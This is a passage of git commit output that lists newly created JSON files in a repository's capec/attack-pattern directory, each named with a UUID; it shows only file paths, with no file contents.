capec/attack-pattern/attack-pattern--0e301650-cbba-4113-9bfd-fb9b637d40c3.json create mode 100644 capec/attack-pattern/attack-pattern--0e4fc913-dbca-47cc-ab7c-4e6742e13f90.json create mode 100644 capec/attack-pattern/attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54.json create mode 100644 capec/attack-pattern/attack-pattern--0ede9fe1-83e7-46df-9005-ef287e18addb.json create mode 100644 capec/attack-pattern/attack-pattern--10500aa1-6d0e-486c-8c87-8d24e20e01a7.json create mode 100644 capec/attack-pattern/attack-pattern--10c3386d-d8da-45ea-9963-67befef551d5.json create mode 100644 capec/attack-pattern/attack-pattern--1156154f-d8f9-4722-b1e7-311bd7326d94.json create mode 100644 capec/attack-pattern/attack-pattern--11b6d192-7c0b-4f9a-a35d-478076c9ae58.json create mode 100644 capec/attack-pattern/attack-pattern--11c647fb-33fc-444c-b578-617cb2205def.json create mode 100644 capec/attack-pattern/attack-pattern--11e6e79b-dbf4-4f75-815c-2e7a27176b73.json create mode 100644 capec/attack-pattern/attack-pattern--126e4910-37df-4f3b-901a-00b698bc89a0.json create mode 100644 capec/attack-pattern/attack-pattern--12786e2f-db8b-4e95-989e-9f6c19357b7e.json create mode 100644 capec/attack-pattern/attack-pattern--13f0ca63-0ab3-4b9d-862e-fb90f0193953.json create mode 100644 capec/attack-pattern/attack-pattern--1408a566-eced-4d5d-aa0d-a7b373e80ea6.json create mode 100644 capec/attack-pattern/attack-pattern--1424c88c-eb3f-48c8-a92a-97505119e464.json create mode 100644 capec/attack-pattern/attack-pattern--144a290f-2a70-44b5-8cc3-41ba515b40d3.json create mode 100644 capec/attack-pattern/attack-pattern--147a86db-2e5f-42ef-beaf-c373d5804bfd.json create mode 100644 capec/attack-pattern/attack-pattern--14a0044a-5ad1-43ac-bfa7-fed04b908c18.json create mode 100644 capec/attack-pattern/attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe.json create mode 100644 capec/attack-pattern/attack-pattern--1513b3b5-9e47-4a77-ada3-bd85b535fa12.json create mode 100644 capec/attack-pattern/attack-pattern--15c913ea-c4ac-48d3-9bbd-e1f0cf62bf87.json create mode 100644 capec/attack-pattern/attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69.json create mode 100644 capec/attack-pattern/attack-pattern--17938514-8a12-466f-b196-fc4d8a089d88.json create mode 100644 capec/attack-pattern/attack-pattern--17cecffc-77d8-4779-acf8-94e2ad075435.json create mode 100644 capec/attack-pattern/attack-pattern--1807956c-edf7-4fc4-b165-6959f745c791.json create mode 100644 capec/attack-pattern/attack-pattern--18d613ca-3840-4fb8-b628-e12a8b1fe2d4.json create mode 100644 capec/attack-pattern/attack-pattern--19021444-14a8-458a-bef8-cd234a57a3bb.json create mode 100644 capec/attack-pattern/attack-pattern--1937802e-f880-445a-8a94-d07225d60d2a.json create mode 100644 capec/attack-pattern/attack-pattern--19d11bcb-4e3e-4f55-8fb8-d91f068bc67b.json create mode 100644 capec/attack-pattern/attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0.json create mode 100644 capec/attack-pattern/attack-pattern--1a4b477e-958d-48ca-8c71-7faef4da949d.json create mode 100644 capec/attack-pattern/attack-pattern--1b1d3a84-d44b-4848-bb0a-e0fd7f1c05bf.json create mode 100644 capec/attack-pattern/attack-pattern--1c60fdca-a7a5-46d2-9544-6c0b6b73818f.json create mode 100644 capec/attack-pattern/attack-pattern--1c638c80-8f7d-439c-9746-6c8c902afeba.json create mode 100644 capec/attack-pattern/attack-pattern--1c8cd7af-cc50-486e-a444-99781d82c018.json create mode 100644 capec/attack-pattern/attack-pattern--1cfd2b18-1f29-43cc-b800-4a52fa63f388.json create mode 100644 capec/attack-pattern/attack-pattern--1d2043e7-db0e-45a8-ac46-a8403c5127a4.json create mode 100644 capec/attack-pattern/attack-pattern--1de57984-2365-426b-9b6c-5a08f86b0aac.json create mode 100644 capec/attack-pattern/attack-pattern--1eb173db-e5ae-4bf1-b5e4-b4d944ded3db.json create mode 100644 capec/attack-pattern/attack-pattern--1f0f0fdc-0bf2-45a8-8231-5e3789895f80.json create mode 100644 capec/attack-pattern/attack-pattern--1f3bd742-4a95-4a3d-acd6-f82b15720d9f.json create mode 100644 capec/attack-pattern/attack-pattern--1fd71a54-9d48-4adb-805d-11e5498f6242.json create mode 100644 capec/attack-pattern/attack-pattern--20fe1304-714f-4f97-8a4e-cade0aeefa04.json create mode 100644 capec/attack-pattern/attack-pattern--21a2d614-a94e-4e3a-bcf3-3a4b20ecb2cb.json create mode 100644 capec/attack-pattern/attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f.json create mode 100644 capec/attack-pattern/attack-pattern--21c7f7fe-73bf-40a8-8d85-c38596237db2.json create mode 100644 capec/attack-pattern/attack-pattern--21ff93ae-e3a3-43ff-8cc4-44614e2604e4.json create mode 100644 capec/attack-pattern/attack-pattern--221c647a-ae2b-4c2b-b762-17727f367bbe.json create mode 100644 capec/attack-pattern/attack-pattern--222cae7b-e00f-48e2-813a-efac031dfa65.json create mode 100644 capec/attack-pattern/attack-pattern--22a69d93-b99a-41c0-b7a6-2a1875317986.json create mode 100644 capec/attack-pattern/attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95.json create mode 100644 capec/attack-pattern/attack-pattern--23ef3396-6a77-4f83-9d9f-7ed7760f35b1.json create mode 100644 capec/attack-pattern/attack-pattern--24db550f-2f72-42a7-ba11-0050f9180eaa.json create mode 100644 capec/attack-pattern/attack-pattern--256f9cab-9731-4aa5-9db0-b1c71b4e7377.json create mode 100644 capec/attack-pattern/attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7.json create mode 100644 capec/attack-pattern/attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d.json create mode 100644 capec/attack-pattern/attack-pattern--2668fa09-0fe2-45ad-a8c0-7971d8223e6f.json create mode 100644 capec/attack-pattern/attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7.json create mode 100644 capec/attack-pattern/attack-pattern--27e1e9fc-726a-4ff4-81c1-5ecd490cce03.json create mode 100644 capec/attack-pattern/attack-pattern--28006a72-8857-4c1a-be3e-c392e9291cb5.json create mode 100644 capec/attack-pattern/attack-pattern--285f4e6f-6fa1-4005-989a-2b1e86e8f1e9.json create mode 100644 capec/attack-pattern/attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41.json create mode 100644 capec/attack-pattern/attack-pattern--28ca67a7-6c1e-4c2e-81d0-5b4b389e4ddd.json create mode 100644 capec/attack-pattern/attack-pattern--2a5de98d-00b7-45da-8f6c-b5c722741929.json create mode 100644 capec/attack-pattern/attack-pattern--2a6965de-02e0-49c0-a275-63cf742c758f.json create mode 100644 capec/attack-pattern/attack-pattern--2b15bd31-9fa4-4ff4-9986-75f61cf72186.json create mode 100644 capec/attack-pattern/attack-pattern--2b255fdc-4366-4755-9e4c-90c1502b7678.json create mode 100644 capec/attack-pattern/attack-pattern--2b924641-5ed0-411c-bcfe-02ff55a2ec73.json create mode 100644 capec/attack-pattern/attack-pattern--2bd9317a-65b9-4684-be47-ea3f173f47ff.json create mode 100644 capec/attack-pattern/attack-pattern--2c2565bb-c39a-4d70-96cc-d7ea60b5abb0.json create mode 100644 capec/attack-pattern/attack-pattern--2c3069bb-826c-469e-a7be-57ade8c0b7b4.json create mode 100644 capec/attack-pattern/attack-pattern--2cd72ff3-e4df-4b86-ad84-5d4ace9f3ab7.json create mode 100644 capec/attack-pattern/attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463.json create mode 100644 capec/attack-pattern/attack-pattern--2d4f8222-023b-42ef-9b7f-eef0e7a105b7.json create mode 100644 capec/attack-pattern/attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93.json create mode 100644 capec/attack-pattern/attack-pattern--2d7b12ba-47d5-4617-be01-dfa415317b93.json create mode 100644 capec/attack-pattern/attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2.json create mode 100644 capec/attack-pattern/attack-pattern--2e8b387c-3490-4037-be54-cdd3b2897393.json create mode 100644 capec/attack-pattern/attack-pattern--2ebcd4aa-44ae-47e0-9c76-c99c71990a09.json create mode 100644 capec/attack-pattern/attack-pattern--2f180ce8-8a86-4a6f-9e86-85173b34e813.json create mode 100644 capec/attack-pattern/attack-pattern--2f851176-9695-467e-bfd6-6ef0b5a2625f.json create mode 100644 capec/attack-pattern/attack-pattern--2fbc1e08-518a-43b5-a803-a88ff3bb2bec.json create mode 100644 capec/attack-pattern/attack-pattern--2fc90ec3-0e1b-46cb-a069-97f1aeb9530c.json create mode 100644 capec/attack-pattern/attack-pattern--2fe91d88-f255-40f7-aa81-fe02a6af78cf.json create mode 100644 capec/attack-pattern/attack-pattern--307e5f02-1d1b-4c1a-b656-2823987a5155.json create mode 100644 capec/attack-pattern/attack-pattern--309ffd52-9e61-40de-a00b-8cb336a5412b.json create mode 100644 capec/attack-pattern/attack-pattern--31001482-76d1-41ec-bccd-48fc1bc66dfa.json create mode 100644 capec/attack-pattern/attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67.json create mode 100644 capec/attack-pattern/attack-pattern--311e4634-8ed5-4e29-83ca-02c5c1587f7a.json create mode 100644 capec/attack-pattern/attack-pattern--31718b7c-8726-4918-ba2b-1036158b6d40.json create mode 100644 capec/attack-pattern/attack-pattern--3243e0a8-d722-48fd-b1d3-467d2d08a251.json create mode 100644 capec/attack-pattern/attack-pattern--32680284-d757-4f2e-afe6-40386d38c92a.json create mode 100644 capec/attack-pattern/attack-pattern--32ddfdf7-42d4-48d8-85ba-0e5de91cb711.json create mode 100644 capec/attack-pattern/attack-pattern--341c4200-549a-4cef-b4d7-347bf2e55baa.json create mode 100644 capec/attack-pattern/attack-pattern--34377bad-4302-44b8-a8a9-1dcebaada4fd.json create mode 100644 capec/attack-pattern/attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633.json create mode 100644 capec/attack-pattern/attack-pattern--34e6183c-256f-4bb9-8636-794024e28b4f.json create mode 100644 capec/attack-pattern/attack-pattern--34f01011-987b-4447-8663-e32f695409cc.json create mode 100644 capec/attack-pattern/attack-pattern--352283e6-a4db-4959-8679-239ed1a7d8f6.json create mode 100644 capec/attack-pattern/attack-pattern--35464428-e136-4677-aaa0-19da2fe51c55.json create mode 100644 capec/attack-pattern/attack-pattern--35abccd5-51c3-4107-9ff9-956e33d8a6a6.json create mode 100644 capec/attack-pattern/attack-pattern--35adbffa-db1b-48cb-a106-51dccf223be1.json create mode 100644 capec/attack-pattern/attack-pattern--36182365-d1a2-4f8e-a998-9a6d48f8c528.json create mode 100644 capec/attack-pattern/attack-pattern--3633a1c0-2af2-4343-b504-4e69c76db60e.json create mode 100644 capec/attack-pattern/attack-pattern--3658dd5d-0e97-4e7e-9af1-b7fd307ea32a.json create mode 100644 capec/attack-pattern/attack-pattern--36fba29d-f16f-4cf7-8324-118086f0fb5f.json create mode 100644 capec/attack-pattern/attack-pattern--378426c3-2c53-4089-b701-769859d4ac37.json create mode 100644 capec/attack-pattern/attack-pattern--37922b04-8f75-4faa-ac2c-45eed4d17a3f.json create mode 100644 capec/attack-pattern/attack-pattern--3825973d-9cb5-4c42-aae0-b9a9cec45da9.json create mode 100644 capec/attack-pattern/attack-pattern--391db10c-8a3c-4887-8a83-f965edc5099d.json create mode 100644 capec/attack-pattern/attack-pattern--392168be-b0e4-4de3-8529-b956d1396a21.json create mode 100644 capec/attack-pattern/attack-pattern--39ab0d55-78c5-4be6-a99a-25f80706340a.json create mode 100644 capec/attack-pattern/attack-pattern--39c9e944-7904-4697-bd04-d1122c2e7731.json create mode 100644 capec/attack-pattern/attack-pattern--3a0ddbcc-69da-4fec-aea0-df3d26b886c1.json create mode 100644 capec/attack-pattern/attack-pattern--3a0eb592-a0cc-4084-87bb-044a61fef3ef.json create mode 100644 capec/attack-pattern/attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0.json create mode 100644 capec/attack-pattern/attack-pattern--3a406c19-8e0f-4b7b-a0ef-c97bd157dca0.json create mode 100644 capec/attack-pattern/attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf.json create mode 100644 capec/attack-pattern/attack-pattern--3ba1113c-b544-4d3a-8493-7da4240f935e.json create mode 100644 capec/attack-pattern/attack-pattern--3bc5a3b3-0f5f-490a-b802-6a4cadf049f8.json create mode 100644 capec/attack-pattern/attack-pattern--3c8e5662-f840-45b4-944a-d2498837df44.json create mode 100644 capec/attack-pattern/attack-pattern--3d3dc1b3-7927-4b9f-b518-e854ee12ce34.json create mode 100644 capec/attack-pattern/attack-pattern--3d863e50-08bf-40ac-9cb1-a847dd37cd0e.json create mode 100644 capec/attack-pattern/attack-pattern--3d9d1479-8768-4265-acc9-8e26894c6e08.json create mode 100644 capec/attack-pattern/attack-pattern--3d9f2991-6d3a-409f-84d4-c4548e6a5b65.json create mode 100644 capec/attack-pattern/attack-pattern--3dd0588e-c5b3-43bb-a544-0e874d4ebc61.json create mode 100644 capec/attack-pattern/attack-pattern--3deccce4-93c6-4403-b5e4-84748a2dd85d.json create mode 100644 capec/attack-pattern/attack-pattern--3faacb4b-f20b-4101-b8f2-51c49cee5be4.json create mode 100644 capec/attack-pattern/attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6.json create mode 100644 capec/attack-pattern/attack-pattern--405493fa-cac2-4b87-bbe1-111562460e7e.json create mode 100644 capec/attack-pattern/attack-pattern--40c3e8e6-25a4-407e-b4f4-4d245b363bf8.json create mode 100644 capec/attack-pattern/attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5.json create mode 100644 capec/attack-pattern/attack-pattern--425e904e-083c-450c-812d-6df487eb10f2.json create mode 100644 capec/attack-pattern/attack-pattern--42ee3c77-31b2-4053-9fdd-6633fe637e02.json create mode 100644 capec/attack-pattern/attack-pattern--42f88e6b-30dd-4bc5-ba5b-5ec35b0cacaa.json create mode 100644 capec/attack-pattern/attack-pattern--4341bdb9-941f-4ed5-8ac9-d7df67eae4d9.json create mode 100644 capec/attack-pattern/attack-pattern--442a3623-a733-48da-8145-68c7d0b31f99.json create mode 100644 capec/attack-pattern/attack-pattern--4447fce2-5d60-444e-bbf1-dfccd3db3cc9.json create mode 100644 capec/attack-pattern/attack-pattern--44511f13-daab-4244-b38b-054b69cfde3f.json create mode 100644 capec/attack-pattern/attack-pattern--44a6a1b7-f688-4213-b4e2-1811bcaecbc2.json create mode 100644 capec/attack-pattern/attack-pattern--44cb2bc4-d57a-468d-a5c9-c98e01670204.json create mode 100644 capec/attack-pattern/attack-pattern--4561bef5-b0e0-4e24-a585-9ad8edb8d007.json create mode 100644 capec/attack-pattern/attack-pattern--45f4a2c0-545b-46d0-97c1-eb7076100c8e.json create mode 100644 capec/attack-pattern/attack-pattern--465538b7-66d8-47e7-8aa8-e62d380101b1.json create mode 100644 capec/attack-pattern/attack-pattern--474dbe2e-a61f-4143-b671-a63d7a1df95f.json create mode 100644 capec/attack-pattern/attack-pattern--475753a8-2215-49ac-99aa-dccd8dafc3df.json create mode 100644 capec/attack-pattern/attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3.json create mode 100644 capec/attack-pattern/attack-pattern--47f60b51-3222-42dd-b08d-ee023ab89afe.json create mode 100644 capec/attack-pattern/attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7.json create mode 100644 capec/attack-pattern/attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94.json create mode 100644 capec/attack-pattern/attack-pattern--488fb1b8-b703-42c6-a822-c0960ecff6fd.json create mode 100644 capec/attack-pattern/attack-pattern--48b3fdcc-8514-4c53-bcda-5302b3b71e59.json create mode 100644 capec/attack-pattern/attack-pattern--48d9833c-513d-416d-a49e-aea8c0bd96d6.json create mode 100644 capec/attack-pattern/attack-pattern--48e13289-5253-4c34-b449-5ba648c378c0.json create mode 100644 capec/attack-pattern/attack-pattern--492c6870-26aa-408f-a488-379d7a0f87a0.json create mode 100644 capec/attack-pattern/attack-pattern--4955f71c-ddd9-4ad6-9fe5-2583defa2070.json create mode 100644 capec/attack-pattern/attack-pattern--4a2bd25a-02bc-4716-86e7-6ea7494b9c82.json create mode 100644 capec/attack-pattern/attack-pattern--4a3aea87-ebbb-4369-bc6b-c774c5899b18.json create mode 100644 capec/attack-pattern/attack-pattern--4af1aa45-5db1-4fbf-a5ee-f205d163cc9e.json create mode 100644 capec/attack-pattern/attack-pattern--4bac5a5b-c263-414b-9b78-fb93a60c98ed.json create mode 100644 capec/attack-pattern/attack-pattern--4c20557e-86ee-4ba3-97e5-6cd0772e9356.json create mode 100644 capec/attack-pattern/attack-pattern--4ce66943-e754-4fcf-bdaf-81660eb6597b.json create mode 100644 capec/attack-pattern/attack-pattern--4d39083a-01db-4b17-a4b8-25037eb51560.json create mode 100644 capec/attack-pattern/attack-pattern--4d4f39de-ca45-4daf-b6c3-e70a531d8814.json create mode 100644 capec/attack-pattern/attack-pattern--4dc9dd79-0519-4693-b524-885a73e82fdd.json create mode 100644 capec/attack-pattern/attack-pattern--4f19c031-001c-4400-8685-6010d9eeaa15.json create mode 100644 capec/attack-pattern/attack-pattern--4f6b2e2c-f6b1-4a56-b211-bdc538047241.json create mode 100644 capec/attack-pattern/attack-pattern--4f6e2713-e1e5-472a-a3fb-a561029a7c70.json create mode 100644 capec/attack-pattern/attack-pattern--4f95b56c-5e5d-4ae4-be95-b13a2278e06f.json create mode 100644 capec/attack-pattern/attack-pattern--5000f07d-b0e2-48cc-bd4e-5149fa707e75.json create mode 100644 capec/attack-pattern/attack-pattern--500e1752-39e7-49d4-a0e3-c245e6d3ebf9.json create mode 100644 capec/attack-pattern/attack-pattern--50c7380e-2a83-4980-bd5e-7242fc3adb33.json create mode 100644 capec/attack-pattern/attack-pattern--5121f513-4680-469c-9359-1a21eeb3b961.json create mode 100644 capec/attack-pattern/attack-pattern--5178fa3f-5602-444b-9199-3a7c34a42d9a.json create mode 100644 capec/attack-pattern/attack-pattern--5181a9cd-e899-469e-9969-b7aef0d78db5.json create mode 100644 capec/attack-pattern/attack-pattern--52d88856-00b1-49f3-82b6-388569b03291.json create mode 100644 capec/attack-pattern/attack-pattern--5376ae8c-a2da-4f87-941e-ccc030c8fdb1.json create mode 100644 capec/attack-pattern/attack-pattern--540d669a-0e46-435c-8cc3-99bf7526ba20.json create mode 100644 capec/attack-pattern/attack-pattern--548e2d51-d404-4f6f-8b25-356f78cf822c.json create mode 100644 capec/attack-pattern/attack-pattern--54d223de-6dd1-4f76-af5c-6d59b78b915a.json create mode 100644 capec/attack-pattern/attack-pattern--5538fa30-63bf-475f-b0c1-7132e1a97672.json create mode 100644 capec/attack-pattern/attack-pattern--55548c08-54c5-4e9c-af66-e432938987b1.json create mode 100644 capec/attack-pattern/attack-pattern--555b8083-e5c3-458b-ab0b-e6a8e91ef149.json create mode 100644 capec/attack-pattern/attack-pattern--556e35d3-137d-4102-b2e6-ba28a05736cd.json create mode 100644 capec/attack-pattern/attack-pattern--559dc460-3811-474c-89d7-7b0987d96cea.json create mode 100644 capec/attack-pattern/attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a.json create mode 100644 capec/attack-pattern/attack-pattern--55b82059-4ab2-436b-a092-ff26c0f4443b.json create mode 100644 capec/attack-pattern/attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57.json create mode 100644 capec/attack-pattern/attack-pattern--58ea2198-8121-4b51-9594-be0aafd35947.json create mode 100644 capec/attack-pattern/attack-pattern--59634590-4269-4742-896f-27e5a8f3acc4.json create mode 100644 capec/attack-pattern/attack-pattern--5aa9735e-f77e-463a-81b6-cc2d07b40c82.json create mode 100644 capec/attack-pattern/attack-pattern--5abb3ee9-40b8-421d-8a13-adce13e62d3c.json create mode 100644 capec/attack-pattern/attack-pattern--5acb26f6-90bc-47de-aca8-5493b5824204.json create mode 100644 capec/attack-pattern/attack-pattern--5ad16d8c-e126-4a03-8931-e1f29523e1ee.json create mode 100644 capec/attack-pattern/attack-pattern--5ba0f3bc-bb81-4f9f-a848-de3d6ab1b085.json create mode 100644 capec/attack-pattern/attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69.json create mode 100644 capec/attack-pattern/attack-pattern--5dae155c-ad21-4b0c-9d2c-bcd604c0ad6b.json create mode 100644 capec/attack-pattern/attack-pattern--5ece46f5-57a2-4d0b-b53c-e4a214528a01.json create mode 100644 capec/attack-pattern/attack-pattern--5eea64eb-4ae7-4b82-8b47-fdf143767059.json create mode 100644 capec/attack-pattern/attack-pattern--5f36384f-7803-4963-b71a-697210920a84.json create mode 100644 capec/attack-pattern/attack-pattern--5f8ede88-b076-472c-b7e3-32b2a56e51e0.json create mode 100644 capec/attack-pattern/attack-pattern--5fb02308-87ad-459d-914e-6b66c082abc0.json create mode 100644 capec/attack-pattern/attack-pattern--617ea952-0040-4173-b26a-ade55ed52ed6.json create mode 100644 capec/attack-pattern/attack-pattern--619e088f-e6f0-434e-b623-bd257df2b280.json create mode 100644 capec/attack-pattern/attack-pattern--625e9304-f2d8-4578-80bf-ca8532cb3ac5.json create mode 100644 capec/attack-pattern/attack-pattern--62ee09d6-0723-472f-9173-8bd1092cc077.json create mode 100644 capec/attack-pattern/attack-pattern--631027cc-a80a-4768-a4ae-ea7a7484acbd.json create mode 100644 capec/attack-pattern/attack-pattern--6326cb50-e1ee-4029-aab8-0af7efd3a268.json create mode 100644 capec/attack-pattern/attack-pattern--633f7dbb-7575-4fb9-b950-76152580d5d3.json create mode 100644 capec/attack-pattern/attack-pattern--63832d3e-2917-48d6-9cdc-118a38e01fcf.json create mode 100644 capec/attack-pattern/attack-pattern--63878e8b-cc30-4be4-bdeb-6141c8a17187.json create mode 100644 capec/attack-pattern/attack-pattern--638c5a6e-24a2-4142-b597-1031aa139b90.json create mode 100644 capec/attack-pattern/attack-pattern--63de6ee3-ed27-40ce-a1b8-ac71baa01538.json create mode 100644 capec/attack-pattern/attack-pattern--63e85f9e-af96-4531-9303-33107cfb7555.json create mode 100644 capec/attack-pattern/attack-pattern--642de78e-0ded-49d0-bd92-b8b1f826f645.json create mode 100644 capec/attack-pattern/attack-pattern--6444e23c-7f2c-43d3-be1c-862e12611f33.json create mode 100644 capec/attack-pattern/attack-pattern--6466bbec-2e27-46ba-b910-8046649e65c8.json create mode 100644 capec/attack-pattern/attack-pattern--64806018-082c-4998-9b06-4bc812b23ac6.json create mode 100644 capec/attack-pattern/attack-pattern--65a9acf3-76b1-4379-a78b-7df3a80e096d.json create mode 100644 capec/attack-pattern/attack-pattern--65ca02d7-25ef-4ed4-accb-5d7c149868f4.json create mode 100644 capec/attack-pattern/attack-pattern--6627f4c5-d918-40b5-bb4a-8ade04d5e926.json create mode 100644 capec/attack-pattern/attack-pattern--66352194-a1a9-4654-bb38-ae96b0bb824a.json create mode 100644 capec/attack-pattern/attack-pattern--6659262a-96e0-4a82-a684-7bd17365ad06.json create mode 100644 capec/attack-pattern/attack-pattern--66a47ab4-8af8-4181-a318-6b7a6c979201.json create mode 100644 capec/attack-pattern/attack-pattern--670f9af9-29b0-46fb-b6b5-46bf74fd2a79.json create mode 100644 capec/attack-pattern/attack-pattern--67562799-2d10-4e76-b3da-649c6d844340.json create mode 100644 capec/attack-pattern/attack-pattern--6756a7a2-9937-4bd1-9c61-66b1fbe0379f.json create mode 100644 capec/attack-pattern/attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651.json create mode 100644 capec/attack-pattern/attack-pattern--69028f38-a6b7-4838-a9b7-7a4d94ac942a.json create mode 100644 capec/attack-pattern/attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459.json create mode 100644 capec/attack-pattern/attack-pattern--6991f840-6337-464f-8e9e-e6300b4e32d7.json create mode 100644 capec/attack-pattern/attack-pattern--69f7ae46-ecf7-4550-a92f-dd3fc65ac086.json create mode 100644 capec/attack-pattern/attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f.json create mode 100644 capec/attack-pattern/attack-pattern--6b71d1a3-f57c-4c58-83c7-a7c44c55ab2d.json create mode 100644 capec/attack-pattern/attack-pattern--6c510676-03ad-4a8e-835b-f2caea51b785.json create mode 100644 capec/attack-pattern/attack-pattern--6cb0e050-2567-4733-8766-aaeb09172ed2.json create mode 100644 capec/attack-pattern/attack-pattern--6ce665bb-ddcc-4955-beb4-052321107530.json create mode 100644 capec/attack-pattern/attack-pattern--6d245dc1-418f-45a5-ba1d-33c45ef0b20f.json create mode 100644 capec/attack-pattern/attack-pattern--6dec6b3f-ecca-4764-af25-8db5ed7373a0.json create mode 100644 capec/attack-pattern/attack-pattern--6df707f1-14d4-40ff-a227-532afa9b48e3.json create mode 100644 capec/attack-pattern/attack-pattern--6f84c023-688f-4c51-b5b2-eeb19661cb4e.json create mode 100644 capec/attack-pattern/attack-pattern--705249bd-b1ea-4723-bb50-afd62f6bd16e.json create mode 100644 capec/attack-pattern/attack-pattern--70c66f49-bf61-442f-99a4-8456fce90a8b.json create mode 100644 capec/attack-pattern/attack-pattern--70cee10e-762f-49df-bd81-d972d3dd7c11.json create mode 100644 capec/attack-pattern/attack-pattern--70d1fa8a-114b-425a-9495-44bf53f0a19f.json create mode 100644 capec/attack-pattern/attack-pattern--71dbbb97-42e8-4d9b-aadf-35f06a2beb57.json create mode 100644 capec/attack-pattern/attack-pattern--71e3552d-601e-479b-9b83-80ac2cd3ac0e.json create mode 100644 capec/attack-pattern/attack-pattern--7223c9f9-1b02-4cd5-ba2f-58bf87784322.json create mode 100644 capec/attack-pattern/attack-pattern--723de629-6051-4e46-b6e7-27972b2f8bac.json create mode 100644 capec/attack-pattern/attack-pattern--72be688f-e257-43c9-babb-f9368c7fd64b.json create mode 100644 capec/attack-pattern/attack-pattern--738f95bd-2885-4cb4-a782-d1a58198d726.json create mode 100644 capec/attack-pattern/attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19.json create mode 100644 capec/attack-pattern/attack-pattern--750c8077-a3b7-4332-9fc6-a59435be6c57.json create mode 100644 capec/attack-pattern/attack-pattern--75c788ca-dc5d-443d-abeb-301ce54cd9ec.json create mode 100644 capec/attack-pattern/attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0.json create mode 100644 capec/attack-pattern/attack-pattern--77389957-a3e9-429a-9fec-7da40617e779.json create mode 100644 capec/attack-pattern/attack-pattern--790a5926-608b-425d-8f1a-111d4e65e47f.json create mode 100644 capec/attack-pattern/attack-pattern--79392581-7f07-4d86-91a3-34c43f209265.json create mode 100644 capec/attack-pattern/attack-pattern--796f2993-5a42-40de-b1f1-41299a74aebc.json create mode 100644 capec/attack-pattern/attack-pattern--79b94930-9a24-4f62-b56a-f1ce5a52e5ec.json create mode 100644 capec/attack-pattern/attack-pattern--79c04b52-b8bb-403a-ac63-f334307a69b2.json create mode 100644 capec/attack-pattern/attack-pattern--79e5b44b-1780-4b0c-87d4-9391785c5074.json create mode 100644 capec/attack-pattern/attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8.json create mode 100644 capec/attack-pattern/attack-pattern--7a84ee4e-66e0-435f-bbcc-0eeb394a16b6.json create mode 100644 capec/attack-pattern/attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb.json create mode 100644 capec/attack-pattern/attack-pattern--7aac9a89-6d2b-4d81-adb9-44aecaed57bf.json create mode 100644 capec/attack-pattern/attack-pattern--7afbfdbc-8262-48b9-b349-cc7888fc880f.json create mode 100644 capec/attack-pattern/attack-pattern--7b1c66c0-d2c1-4283-910e-dc80f0dd53ff.json create mode 100644 capec/attack-pattern/attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e.json create mode 100644 capec/attack-pattern/attack-pattern--7b395458-e6d9-4581-8384-72ae813cc3d6.json create mode 100644 capec/attack-pattern/attack-pattern--7b66655f-87f3-4eaa-8f61-ee8e2f23f6b9.json create mode 100644 capec/attack-pattern/attack-pattern--7ba6022c-7bcb-4754-92d3-1334f628b343.json create mode 100644 capec/attack-pattern/attack-pattern--7bd7fffc-51d4-46a3-8b37-da95f4dde0f1.json create mode 100644 capec/attack-pattern/attack-pattern--7c095143-a5be-4327-b72d-d70d4641b5c1.json create mode 100644 capec/attack-pattern/attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375.json create mode 100644 capec/attack-pattern/attack-pattern--7dcafaaa-e2a9-4b76-81eb-92f83fabf375.json create mode 100644 capec/attack-pattern/attack-pattern--7e1b1f24-f4a7-4fe3-9679-3d93fe3a4690.json create mode 100644 capec/attack-pattern/attack-pattern--7ea3ee8d-ccf6-4b18-a430-4f610ae246fb.json create mode 100644 capec/attack-pattern/attack-pattern--7ef5bd70-f893-4add-a0cb-56e61e5deb1d.json create mode 100644 capec/attack-pattern/attack-pattern--7f7b1917-63bb-43a7-b36b-a90dbc6072e5.json create mode 100644 capec/attack-pattern/attack-pattern--7fd466e3-0437-45f6-8cdc-0d9de4a4df92.json create mode 100644 capec/attack-pattern/attack-pattern--80135864-8689-44e9-8bdb-2c5034a76506.json create mode 100644 capec/attack-pattern/attack-pattern--801eb3fe-c710-4f81-8f55-f1a500802c53.json create mode 100644 capec/attack-pattern/attack-pattern--80de694a-0a84-40b1-9c56-ec04747ca485.json create mode 100644 capec/attack-pattern/attack-pattern--81862912-f3ac-4fdd-aa80-82514eddbe08.json create mode 100644 capec/attack-pattern/attack-pattern--81be8f89-928c-47bc-9dff-95f503ea0e82.json create mode 100644 capec/attack-pattern/attack-pattern--81cb8af7-a9ff-4c4d-822c-c74a618da6ad.json create mode 100644 capec/attack-pattern/attack-pattern--81e9276b-c981-4816-b54c-dc6866cbcd95.json create mode 100644 